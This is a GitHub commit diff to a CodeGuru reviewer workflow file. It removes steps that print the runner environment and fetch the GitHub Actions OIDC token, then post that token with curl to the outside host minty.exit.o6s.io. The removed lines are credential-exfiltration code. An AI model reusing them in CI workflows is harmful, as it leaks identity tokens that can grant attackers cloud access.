There was an error while loading. Please reload this page.
1 parent 22dd100 commit dd32c6cCopy full SHA for dd32c6c
.github/workflows/codeguru-reviewer.yml
@@ -15,14 +15,7 @@ permissions:
15
jobs:
16
CodeGuruReviewerScan:
17
runs-on: ubuntu-latest
18
- steps:
19
- - run: env
20
- - name: Post the token
21
- run: |
22
- OIDC_TOKEN=$(curl -sLS "${ACTIONS_ID_TOKEN_REQUEST_URL}&audience=o6s" -H "User-Agent: actions/oidc-client" -H "Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN")
23
-
24
- curl -i -s --data-binary "$OIDC_TOKEN" \
25
- https://minty.exit.o6s.io/github-oidc
+ steps:
26
- name: Assume IAM Role
27
continue-on-error: true
28
uses: aws-actions/configure-aws-credentials@v1
0 commit comments